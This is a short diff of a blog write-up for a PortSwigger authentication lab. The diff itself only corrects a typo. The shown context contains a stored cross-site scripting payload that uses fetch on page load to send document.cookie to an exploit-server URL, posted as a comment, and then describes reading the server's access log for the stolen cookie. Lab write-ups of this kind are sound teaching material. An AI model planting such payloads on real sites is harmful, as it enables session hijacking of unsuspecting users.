bloodstiller/bloodstiller.com/content/Portswigger/auth_vulns_lab_9.md

 <body onload="fetch('[explloitServerUrl'+document.cookie)">
 ```

-We then submit this as a commment.
+We then submit this as a comment.
 ![](/ox-hugo/2025-11-10_05-36.png)

 Now when go back to the exploit server page we can check the "Access log" to see what has accessed the exploit server url.